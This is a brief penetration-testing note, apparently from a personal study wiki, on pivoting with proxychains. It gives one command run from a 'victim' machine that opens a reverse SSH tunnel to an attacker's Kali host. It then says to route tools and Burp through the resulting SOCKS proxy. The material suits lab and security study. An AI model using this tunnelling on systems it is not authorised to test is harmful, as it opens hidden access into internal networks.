pivoting with proxychains


edit the proxychains.conf and run the ssh command from the victim.
ssh -N -R *:5050 kali@192.168.119.212




you can add proxychains command before other standard commands.
for burp, start the burp as normal and edit the socks proxy section. 

Last updated